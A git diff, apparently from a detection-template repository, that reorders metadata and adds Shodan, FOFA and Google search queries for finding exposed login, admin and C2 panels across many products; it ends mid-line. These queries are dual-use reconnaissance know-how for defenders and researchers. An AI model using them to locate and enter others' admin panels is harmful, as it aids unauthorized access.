a/http/exposed-panels/arcgis/arcgis-services.yaml +++ b/http/exposed-panels/arcgis/arcgis-services.yaml @@ -10,11 +10,15 @@ info: classification: cpe: cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: arcgis_server - shodan-query: title:"ArcGIS" - vendor: esri verified: true + max-request: 1 + vendor: esri + product: arcgis_server + shodan-query: + - title:"ArcGIS" + - http.title:"arcgis" + fofa-query: title="arcgis" + google-query: intitle:"arcgis" tags: panel,arcgis,rest,api,detect,esri http: diff --git a/http/exposed-panels/archibus-webcentral-panel.yaml b/http/exposed-panels/archibus-webcentral-panel.yaml index de30e0b585..2276991da2 100644 --- a/http/exposed-panels/archibus-webcentral-panel.yaml +++ b/http/exposed-panels/archibus-webcentral-panel.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:archibus:web_central:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 3 + vendor: archibus product: web_central shodan-query: http.favicon.hash:889652940 - vendor: archibus - verified: true + fofa-query: icon_hash=889652940 tags: panel,archibus http: diff --git a/http/exposed-panels/arcserve-panel.yaml b/http/exposed-panels/arcserve-panel.yaml index 4b8a7cacf1..8bb7f4ae8a 100644 --- a/http/exposed-panels/arcserve-panel.yaml +++ b/http/exposed-panels/arcserve-panel.yaml @@ -10,12 +10,14 @@ info: classification: cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:* metadata: - fofa-query: icon_hash="-1889244460" - max-request: 1 - product: udp - shodan-query: http.favicon.hash:-1889244460 - vendor: arcserve verified: true + max-request: 1 + vendor: arcserve + product: udp + shodan-query: + - http.favicon.hash:-1889244460 + - http.favicon.hash:"-1889244460" + fofa-query: icon_hash="-1889244460" tags: panel,login,arcserve,detect http: diff --git a/http/exposed-panels/arris-modem-detect.yaml b/http/exposed-panels/arris-modem-detect.yaml index 85b31d31f7..fef2d3039a 100644 --- a/http/exposed-panels/arris-modem-detect.yaml +++ b/http/exposed-panels/arris-modem-detect.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:commscope:dg3450:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: dg3450 - shodan-query: html:"phy.htm" - vendor: commscope verified: true + max-request: 1 + vendor: commscope + product: dg3450 + shodan-query: + - html:"phy.htm" + - http.html:"phy.htm" + fofa-query: body="phy.htm" tags: panel,arris,commscope http: diff --git a/http/exposed-panels/aspcms-backend-panel.yaml b/http/exposed-panels/aspcms-backend-panel.yaml index 81821166f4..b66513dd63 100644 --- a/http/exposed-panels/aspcms-backend-panel.yaml +++ b/http/exposed-panels/aspcms-backend-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/GREENHAT7/pxplan/blob/main/goby_pocs/Aspcms_Backend_Leak.json metadata: - fofa-query: app="ASPCMS" - max-request: 2 verified: true + max-request: 2 + fofa-query: app="ASPCMS" tags: panel,login,aspcms,admin http: diff --git a/http/exposed-panels/aspect-control-panel.yaml b/http/exposed-panels/aspect-control-panel.yaml index 1ca2d40872..7f970b86f1 100644 --- a/http/exposed-panels/aspect-control-panel.yaml +++ b/http/exposed-panels/aspect-control-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1011076161 - verified: true tags: panel,aspect,login http: diff --git a/http/exposed-panels/asus-aicloud-panel.yaml b/http/exposed-panels/asus-aicloud-panel.yaml index 035b14eb56..b226835914 100644 --- a/http/exposed-panels/asus-aicloud-panel.yaml +++ b/http/exposed-panels/asus-aicloud-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.asus.com/in/content/aicloud/ metadata: + verified: "true" max-request: 1 shodan-query: title:"AiCloud" - verified: "true" tags: panel,asus,aicloud,detect http: diff --git a/http/exposed-panels/asus-router-panel.yaml b/http/exposed-panels/asus-router-panel.yaml index 50dfe3aca4..58f49474f4 100644 --- a/http/exposed-panels/asus-router-panel.yaml +++ b/http/exposed-panels/asus-router-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: 'Server: httpd/2.0 port:8080' - verified: true tags: panel,asus,router,iot http: diff --git a/http/exposed-panels/atlantis-detect.yaml b/http/exposed-panels/atlantis-detect.yaml index b8b0ab3df1..923ee50a4d 100644 --- a/http/exposed-panels/atlantis-detect.yaml +++ b/http/exposed-panels/atlantis-detect.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:runatlantis:atlantis:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: runatlantis product: atlantis shodan-query: http.favicon.hash:-1706783005 - vendor: runatlantis - verified: true + fofa-query: icon_hash=-1706783005 tags: panel,atlantis,runatlantis http: diff --git a/http/exposed-panels/atlassian-bamboo-panel.yaml b/http/exposed-panels/atlassian-bamboo-panel.yaml index f09d8afd9b..4d661a593c 100644 --- a/http/exposed-panels/atlassian-bamboo-panel.yaml +++ b/http/exposed-panels/atlassian-bamboo-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.atlassian.com/software/bamboo metadata: + verified: true max-request: 1 shodan-query: http.title:"Bamboo" - verified: true tags: panel,bamboo,login,detect http: diff --git a/http/exposed-panels/atlassian-crowd-panel.yaml b/http/exposed-panels/atlassian-crowd-panel.yaml index 46d60c3106..bf9f0769b8 100644 --- a/http/exposed-panels/atlassian-crowd-panel.yaml +++ b/http/exposed-panels/atlassian-crowd-panel.yaml @@ -11,10 +11,11 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* metadata: - category: sso max-request: 1 - product: crowd vendor: atlassian + product: crowd + category: sso + shodan-query: http.component:"atlassian jira" tags: panel,atlassian http: diff --git a/http/exposed-panels/audiobookshelf-panel.yaml b/http/exposed-panels/audiobookshelf-panel.yaml index 47a1227c37..344c24df9c 100644 --- a/http/exposed-panels/audiobookshelf-panel.yaml +++ b/http/exposed-panels/audiobookshelf-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/advplyr/audiobookshelf metadata: + verified: true max-request: 2 shodan-query: title:"Audiobookshelf" - verified: true tags: panel,audiobookshelf,detect http: diff --git a/http/exposed-panels/audiocodes-detect.yaml b/http/exposed-panels/audiocodes-detect.yaml index 31fd950bd3..b238a8f217 100644 --- a/http/exposed-panels/audiocodes-detect.yaml +++ b/http/exposed-panels/audiocodes-detect.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Audiocodes" - verified: true tags: panel,audiocodes http: diff --git a/http/exposed-panels/authelia-panel.yaml b/http/exposed-panels/authelia-panel.yaml index fbdb95d748..a870f2c5cb 100644 --- a/http/exposed-panels/authelia-panel.yaml +++ b/http/exposed-panels/authelia-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/authelia/authelia - https://www.authelia.com/ metadata: + verified: true max-request: 1 shodan-query: title:"Login - Authelia" - verified: true tags: login,panel,authelia http: diff --git a/http/exposed-panels/automatisch-panel.yaml b/http/exposed-panels/automatisch-panel.yaml index a9d888edee..820ccb5a6d 100644 --- a/http/exposed-panels/automatisch-panel.yaml +++ b/http/exposed-panels/automatisch-panel.yaml @@ -10,9 +10,9 @@ info: - https://automatisch.io/ - https://github.com/automatisch/automatisch metadata: + verified: true max-request: 2 shodan-query: title:"Automatisch" - verified: true tags: panel,automatisch,detect http: diff --git a/http/exposed-panels/autoset-detect.yaml b/http/exposed-panels/autoset-detect.yaml index d3d2b8c6d6..d891720054 100644 --- a/http/exposed-panels/autoset-detect.yaml +++ b/http/exposed-panels/autoset-detect.yaml @@ -7,10 +7,10 @@ info: reference: - http://autoset.net/xe/ metadata: + verified: true max-request: 1 shodan-query: title:"AutoSet" - verified: true - tags: tech,php,autoset,apache + tags: tech,php,autoset,apache,panel http: - method: GET diff --git a/http/exposed-panels/avantfax-panel.yaml b/http/exposed-panels/avantfax-panel.yaml index f2ed76974b..15f44f7e53 100644 --- a/http/exposed-panels/avantfax-panel.yaml +++ b/http/exposed-panels/avantfax-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:avantfax:avantfax:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: avantfax - shodan-query: http.title:"AvantFAX - Login" vendor: avantfax + product: avantfax + shodan-query: + - http.title:"AvantFAX - Login" + - http.title:"avantfax - login" + fofa-query: title="avantfax - login" + google-query: intitle:"avantfax - login" tags: panel,avantfax,login http: diff --git a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml index e8a90e426a..d5fc1c9f4a 100644 --- a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:avaya:aura_communication_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: aura_communication_manager vendor: avaya + product: aura_communication_manager tags: panel,avaya http: diff --git a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml index ad8275d351..2f87f2202d 100644 --- a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:avaya:aura_system_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: aura_system_manager vendor: avaya + product: aura_system_manager tags: panel,avaya http: diff --git a/http/exposed-panels/aviatrix-panel.yaml b/http/exposed-panels/aviatrix-panel.yaml index 53e4233d1b..4508727381 100644 --- a/http/exposed-panels/aviatrix-panel.yaml +++ b/http/exposed-panels/aviatrix-panel.yaml @@ -12,9 +12,13 @@ info: cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: controller - shodan-query: http.title:"Aviatrix Cloud Controller" vendor: aviatrix + product: controller + shodan-query: + - http.title:"Aviatrix Cloud Controller" + - http.title:"aviatrix cloud controller" + fofa-query: title="aviatrix cloud controller" + google-query: intitle:"aviatrix cloud controller" tags: panel,aviatrix http: diff --git a/http/exposed-panels/avigilon-panel.yaml b/http/exposed-panels/avigilon-panel.yaml index e685f90c2b..ebcc001bc6 100644 --- a/http/exposed-panels/avigilon-panel.yaml +++ b/http/exposed-panels/avigilon-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:avigilon:avigilon_control_center:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: avigilon_control_center - shodan-query: http.title:"Login - Avigilon Control Center" - vendor: avigilon verified: true + max-request: 1 + vendor: avigilon + product: avigilon_control_center + shodan-query: + - http.title:"Login - Avigilon Control Center" + - http.title:"login - avigilon control center" + fofa-query: title="login - avigilon control center" + google-query: intitle:"login - avigilon control center" tags: panel,avigilon http: diff --git a/http/exposed-panels/aws-ec2-autoscale.yaml b/http/exposed-panels/aws-ec2-autoscale.yaml index bd21d67803..dcf58b2434 100644 --- a/http/exposed-panels/aws-ec2-autoscale.yaml +++ b/http/exposed-panels/aws-ec2-autoscale.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=620605120110011&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: html:"AWS EC2 Auto Scaling Lab" - verified: true tags: exposure,ec2,aws,amazon,panel http: diff --git a/http/exposed-panels/aws-opensearch-login.yaml b/http/exposed-panels/aws-opensearch-login.yaml index 57a2128475..387441e6c8 100644 --- a/http/exposed-panels/aws-opensearch-login.yaml +++ b/http/exposed-panels/aws-opensearch-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:amazon:opensearch:*:*:*:*:maven:*:*:* metadata: max-request: 1 - product: opensearch vendor: amazon + product: opensearch tags: panel,opensearch,aws,amazon http: diff --git a/http/exposed-panels/axel-webserver.yaml b/http/exposed-panels/axel-webserver.yaml index 4bf951cac5..01c1e2325f 100644 --- a/http/exposed-panels/axel-webserver.yaml +++ b/http/exposed-panels/axel-webserver.yaml @@ -9,10 +9,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="AxelWebServer" + verified: true max-request: 1 shodan-query: http.title:"Axel" - verified: true + fofa-query: app="AxelWebServer" tags: panel,axel,webserver http: diff --git a/http/exposed-panels/axway-api-manager-panel.yaml b/http/exposed-panels/axway-api-manager-panel.yaml index eb61cd9622..daefc4aae2 100644 --- a/http/exposed-panels/axway-api-manager-panel.yaml +++ b/http/exposed-panels/axway-api-manager-panel.yaml @@ -5,9 +5,9 @@ info: author: johnk3r severity: info metadata: + verified: true max-request: 1 shodan-query: http.title:"Axway API Manager Login" - verified: true tags: panel,axway,detect http: diff --git a/http/exposed-panels/axway-securetransport-panel.yaml b/http/exposed-panels/axway-securetransport-panel.yaml index 91db597ee1..7415fa09ee 100644 --- a/http/exposed-panels/axway-securetransport-panel.yaml +++ b/http/exposed-panels/axway-securetransport-panel.yaml @@ -13,11 +13,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:axway:securetransport:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: securetransport - shodan-query: http.title:"SecureTransport" || http.favicon.hash:1330269434 - vendor: axway verified: true + max-request: 1 + vendor: axway + product: securetransport + shodan-query: + - http.title:"SecureTransport" || http.favicon.hash:1330269434 + - http.title:"st web client" + - http.title:"securetransport" || http.favicon.hash:1330269434 + google-query: + - intitle:"st web client" + - intitle:"securetransport" || http.favicon.hash:1330269434 + fofa-query: + - title="securetransport" || http.favicon.hash:1330269434 + - title="st web client" tags: panel,axway,securetransport http: diff --git a/http/exposed-panels/axway-securetransport-webclient.yaml b/http/exposed-panels/axway-securetransport-webclient.yaml index a26113b572..46f22a57ec 100644 --- a/http/exposed-panels/axway-securetransport-webclient.yaml +++ b/http/exposed-panels/axway-securetransport-webclient.yaml @@ -12,11 +12,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:axway:securetransport:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"ST Web Client" - max-request: 1 - product: securetransport - vendor: axway verified: true + max-request: 1 + vendor: axway + product: securetransport + google-query: + - intitle:"ST Web Client" + - intitle:"st web client" + - intitle:"securetransport" || http.favicon.hash:1330269434 + shodan-query: + - http.title:"st web client" + - http.title:"securetransport" || http.favicon.hash:1330269434 + fofa-query: + - title="securetransport" || http.favicon.hash:1330269434 + - title="st web client" tags: panel,axway,securetransport,webclient http: diff --git a/http/exposed-panels/axxon-client-panel.yaml b/http/exposed-panels/axxon-client-panel.yaml index 81107ae2cc..349970fb55 100644 --- a/http/exposed-panels/axxon-client-panel.yaml +++ b/http/exposed-panels/axxon-client-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:axxonsoft:axxon_next:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: axxon_next - shodan-query: title:"Axxon Next client" - vendor: axxonsoft verified: true + max-request: 1 + vendor: axxonsoft + product: axxon_next + shodan-query: + - title:"Axxon Next client" + - http.title:"axxon next client" + fofa-query: title="axxon next client" + google-query: intitle:"axxon next client" tags: panel,axxon,vms,login,detect,axxonsoft http: diff --git a/http/exposed-panels/bedita-panel.yaml b/http/exposed-panels/bedita-panel.yaml index ddb5e1c160..a8293378b0 100644 --- a/http/exposed-panels/bedita-panel.yaml +++ b/http/exposed-panels/bedita-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:bedita:bedita:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: bedita - shodan-query: http.title:"BEdita" vendor: bedita + product: bedita + shodan-query: + - http.title:"BEdita" + - http.title:"bedita" + fofa-query: title="bedita" + google-query: intitle:"bedita" tags: panel,bedita http: diff --git a/http/exposed-panels/beego-admin-dashboard.yaml b/http/exposed-panels/beego-admin-dashboard.yaml index 22d1488037..23cd9abd20 100644 --- a/http/exposed-panels/beego-admin-dashboard.yaml +++ b/http/exposed-panels/beego-admin-dashboard.yaml @@ -14,11 +14,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:beego:beego:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: beego - shodan-query: html:"Beego Admin Dashboard" - vendor: beego verified: true + max-request: 1 + vendor: beego + product: beego + shodan-query: + - html:"Beego Admin Dashboard" + - http.html:"beego admin dashboard" + fofa-query: body="beego admin dashboard" tags: panel,beego,unauth http: diff --git a/http/exposed-panels/beyondtrust-priv-panel.yaml b/http/exposed-panels/beyondtrust-priv-panel.yaml index c229ddb16e..d5ce877fa1 100644 --- a/http/exposed-panels/beyondtrust-priv-panel.yaml +++ b/http/exposed-panels/beyondtrust-priv-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.beyondtrust.com/products/privileged-remote-access metadata: - max-request: 1 - shodan-query: http.html:"BeyondTrust Privileged Remote Access Login" verified: true + max-request: 2 + shodan-query: "http.html:\"BeyondTrust Privileged Remote Access Login\"" tags: panel,beyondtrust,login,detect http: diff --git a/http/exposed-panels/bigbluebutton-login.yaml b/http/exposed-panels/bigbluebutton-login.yaml index 4138ba3f2e..7ff1746bb1 100644 --- a/http/exposed-panels/bigbluebutton-login.yaml +++ b/http/exposed-panels/bigbluebutton-login.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:bigbluebutton:greenlight:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: greenlight vendor: bigbluebutton + product: greenlight tags: panel,bigbluebutton http: diff --git a/http/exposed-panels/bigfix-login.yaml b/http/exposed-panels/bigfix-login.yaml index 9c5494fb58..a68e11a863 100644 --- a/http/exposed-panels/bigfix-login.yaml +++ b/http/exposed-panels/bigfix-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"BigFix" max-request: 1 shodan-query: http.title:"BigFix" + google-query: intitle:"BigFix" tags: panel,bigfix http: diff --git a/http/exposed-panels/bigip-rest-panel.yaml b/http/exposed-panels/bigip-rest-panel.yaml index cc49e1b1c3..12ccfb4d07 100644 --- a/http/exposed-panels/bigip-rest-panel.yaml +++ b/http/exposed-panels/bigip-rest-panel.yaml @@ -16,9 +16,13 @@ info: cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: big-ip_access_policy_manager - shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" vendor: f5 + product: big-ip_access_policy_manager + shodan-query: + - http.title:"BIG-IP®-+Redirect" +"Server" + - http.title:"big-ip®-+redirect" +"server" + fofa-query: title="big-ip®-+redirect" +"server" + google-query: intitle:"big-ip®-+redirect" +"server" tags: panel,bigip,f5 http: diff --git a/http/exposed-panels/biotime-panel.yaml b/http/exposed-panels/biotime-panel.yaml index c5b589e260..a9efea6b24 100644 --- a/http/exposed-panels/biotime-panel.yaml +++ b/http/exposed-panels/biotime-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"BioTime" - verified: true tags: panel,biotime http: diff --git a/http/exposed-panels/bitdefender-gravityzone.yaml b/http/exposed-panels/bitdefender-gravityzone.yaml index 56ce04d8b4..cff67665dc 100644 --- a/http/exposed-panels/bitdefender-gravityzone.yaml +++ b/http/exposed-panels/bitdefender-gravityzone.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:bitdefender:gravityzone:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: gravityzone - shodan-query: title:"Bitdefender GravityZone" - vendor: bitdefender verified: true + max-request: 1 + vendor: bitdefender + product: gravityzone + shodan-query: + - title:"Bitdefender GravityZone" + - http.title:"bitdefender gravityzone" + fofa-query: title="bitdefender gravityzone" + google-query: intitle:"bitdefender gravityzone" tags: panel,bitdefender http: diff --git a/http/exposed-panels/bitrix-panel.yaml b/http/exposed-panels/bitrix-panel.yaml index 358de53163..b8b2eb385a 100644 --- a/http/exposed-panels/bitrix-panel.yaml +++ b/http/exposed-panels/bitrix-panel.yaml @@ -10,8 +10,10 @@ info: cpe: cpe:2.3:a:bitrix:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: bitrix24 vendor: bitrix + product: bitrix24 + shodan-query: http.html:"/bitrix/" + fofa-query: body="/bitrix/" tags: panel,bitrix,login http: diff --git a/http/exposed-panels/bitwarden-vault-panel.yaml b/http/exposed-panels/bitwarden-vault-panel.yaml index c0f79ca4db..2e7382eedc 100644 --- a/http/exposed-panels/bitwarden-vault-panel.yaml +++ b/http/exposed-panels/bitwarden-vault-panel.yaml @@ -9,11 +9,15 @@ info: classification: cpe: cpe:2.3:a:bitwarden:bitwarden:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: bitwarden - shodan-query: title:"Bitwarden Web Vault" - vendor: bitwarden verified: true + max-request: 1 + vendor: bitwarden + product: bitwarden + shodan-query: + - title:"Bitwarden Web Vault" + - http.title:"bitwarden web vault" + fofa-query: title="bitwarden web vault" + google-query: intitle:"bitwarden web vault" tags: panel,bitwarden,vault,detect http: diff --git a/http/exposed-panels/black-duck-panel.yaml b/http/exposed-panels/black-duck-panel.yaml index b7abefcc13..5464f2025e 100644 --- a/http/exposed-panels/black-duck-panel.yaml +++ b/http/exposed-panels/black-duck-panel.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Black Duck" - verified: true tags: panel,blackduck,synopsys http: diff --git a/http/exposed-panels/bloofoxcms-login-panel.yaml b/http/exposed-panels/bloofoxcms-login-panel.yaml index c70416ad14..4496189c18 100644 --- a/http/exposed-panels/bloofoxcms-login-panel.yaml +++ b/http/exposed-panels/bloofoxcms-login-panel.yaml @@ -7,11 +7,13 @@ info: classification: cpe: cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:* metadata: - fofa-query: Powered by bloofoxCMS - max-request: 2 - product: bloofoxcms - vendor: bloofox verified: "true" + max-request: 2 + vendor: bloofox + product: bloofoxcms + fofa-query: + - Powered by bloofoxCMS + - powered by bloofoxcms tags: panel,bloofox,cms http: diff --git a/http/exposed-panels/bmc/bmc-discovery-panel.yaml b/http/exposed-panels/bmc/bmc-discovery-panel.yaml index f7a06681ee..8ad4ee183e 100644 --- a/http/exposed-panels/bmc/bmc-discovery-panel.yaml +++ b/http/exposed-panels/bmc/bmc-discovery-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"BMC Software" - verified: true tags: panel,bmc http: diff --git a/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml b/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml index b872e66d2a..236c050329 100644 --- a/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml +++ b/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml @@ -1,19 +1,19 @@ id: bmc-remedy-sso-panel -info: - name: BMC Remedy SSO Login Panel - Detect - author: righettod - severity: info - description: | - BMC Remedy Single Sign-On domain data entry login panel was detected. - reference: - - https://www.bmc.com/it-solutions/remedy-itsm.html - metadata: - verified: true - max-request: 2 - shodan-query: http.title:"BMC Remedy Single Sign-On domain data entry" - tags: panel,bmc,login,detect - +info: + name: BMC Remedy SSO Login Panel - Detect + author: righettod + severity: info + description: | + BMC Remedy Single Sign-On domain data entry login panel was detected. + reference: + - https://www.bmc.com/it-solutions/remedy-itsm.html + metadata: + verified: true + max-request: 2 + shodan-query: http.title:"BMC Remedy Single Sign-On domain data entry" + tags: panel,bmc,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/bolt-cms-panel.yaml b/http/exposed-panels/bolt-cms-panel.yaml index 540b00d09c..339719234c 100644 --- a/http/exposed-panels/bolt-cms-panel.yaml +++ b/http/exposed-panels/bolt-cms-panel.yaml @@ -13,8 +13,9 @@ info: cpe: cpe:2.3:a:boltcms:bolt:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: bolt vendor: boltcms + product: bolt + shodan-query: cpe:"cpe:2.3:a:bolt:bolt" tags: panel,bolt,cms,login,boltcms http: diff --git a/http/exposed-panels/bookstack-panel.yaml b/http/exposed-panels/bookstack-panel.yaml index d2e5dc91c6..5040dec0f9 100644 --- a/http/exposed-panels/bookstack-panel.yaml +++ b/http/exposed-panels/bookstack-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:bookstackapp:bookstack:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: bookstack - shodan-query: http.title:"BookStack" vendor: bookstackapp + product: bookstack + shodan-query: + - http.title:"BookStack" + - http.title:"bookstack" + fofa-query: title="bookstack" + google-query: intitle:"bookstack" tags: panel,bookstack,bookstackapp http: diff --git a/http/exposed-panels/buildbot-panel.yaml b/http/exposed-panels/buildbot-panel.yaml index 6fd9dc497e..8b4a587b89 100644 --- a/http/exposed-panels/buildbot-panel.yaml +++ b/http/exposed-panels/buildbot-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:buildbot:buildbot:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: buildbot - shodan-query: http.title:"BuildBot" - vendor: buildbot verified: true + max-request: 1 + vendor: buildbot + product: buildbot + shodan-query: + - http.title:"BuildBot" + - http.title:"buildbot" + fofa-query: title="buildbot" + google-query: intitle:"buildbot" tags: panel,buildbot,cicd http: diff --git a/http/exposed-panels/busybox-repository-browser.yaml b/http/exposed-panels/busybox-repository-browser.yaml index 3c9139c8e6..b4cbda0fe7 100644 --- a/http/exposed-panels/busybox-repository-browser.yaml +++ b/http/exposed-panels/busybox-repository-browser.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/mirror/busybox metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="Busybox Repository Browser" - tags: detect,busybox,oss + tags: detect,busybox,oss,panel http: - method: GET diff --git a/http/exposed-panels/bynder-panel.yaml b/http/exposed-panels/bynder-panel.yaml index 9d72dff4bd..4df9fcf7e8 100644 --- a/http/exposed-panels/bynder-panel.yaml +++ b/http/exposed-panels/bynder-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.bynder.com/en/ metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1017650009 - verified: true tags: panel,bynder,login,detect http: diff --git a/http/exposed-panels/c2/ares-rat-c2.yaml b/http/exposed-panels/c2/ares-rat-c2.yaml index 71aa6b7939..8e2cda4833 100644 --- a/http/exposed-panels/c2/ares-rat-c2.yaml +++ b/http/exposed-panels/c2/ares-rat-c2.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py metadata: + verified: true max-request: 1 shodan-query: product:'Ares RAT C2' - verified: true tags: c2,ir,osint,ares,panel,rat http: diff --git a/http/exposed-panels/c2/brute-ratel-c4.yaml b/http/exposed-panels/c2/brute-ratel-c4.yaml index 31e53afd96..81aa3b1c5f 100644 --- a/http/exposed-panels/c2/brute-ratel-c4.yaml +++ b/http/exposed-panels/c2/brute-ratel-c4.yaml @@ -9,9 +9,9 @@ info: reference: - https://bruteratel.com/ metadata: + verified: "true" max-request: 1 shodan-query: http.html_hash:-1957161625 - verified: "true" tags: c2,bruteratel,c4,panel http: diff --git a/http/exposed-panels/c2/caldera-c2.yaml b/http/exposed-panels/c2/caldera-c2.yaml index d8092dae1d..c9b0c10605 100644 --- a/http/exposed-panels/c2/caldera-c2.yaml +++ b/http/exposed-panels/c2/caldera-c2.yaml @@ -10,9 +10,9 @@ info: - https://github.com/mitre/caldera - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py metadata: - fofa-query: http.favicon.hash:-636718605 - max-request: 1 verified: true + max-request: 1 + fofa-query: http.favicon.hash:-636718605 tags: c2,ir,osint,caldera,panel http: diff --git a/http/exposed-panels/c2/covenant-c2.yaml b/http/exposed-panels/c2/covenant-c2.yaml index 3321d610c8..b4a69cce82 100644 --- a/http/exposed-panels/c2/covenant-c2.yaml +++ b/http/exposed-panels/c2/covenant-c2.yaml @@ -9,9 +9,9 @@ info: reference: | https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: + verified: true max-request: 1 shodan-query: ssl:”Covenant” http.component:”Blazor” - verified: true tags: c2,ir,osint,covenant,panel http: diff --git a/http/exposed-panels/c2/deimos-c2.yaml b/http/exposed-panels/c2/deimos-c2.yaml index ec42a53d8f..0676958d0c 100644 --- a/http/exposed-panels/c2/deimos-c2.yaml +++ b/http/exposed-panels/c2/deimos-c2.yaml @@ -9,9 +9,9 @@ info: reference: | https://twitter.com/MichalKoczwara/status/1551632627387473920 metadata: + verified: true max-request: 1 shodan-query: http.html_hash:-14029177 - verified: true tags: c2,ir,osint,deimosc2,panel http: diff --git 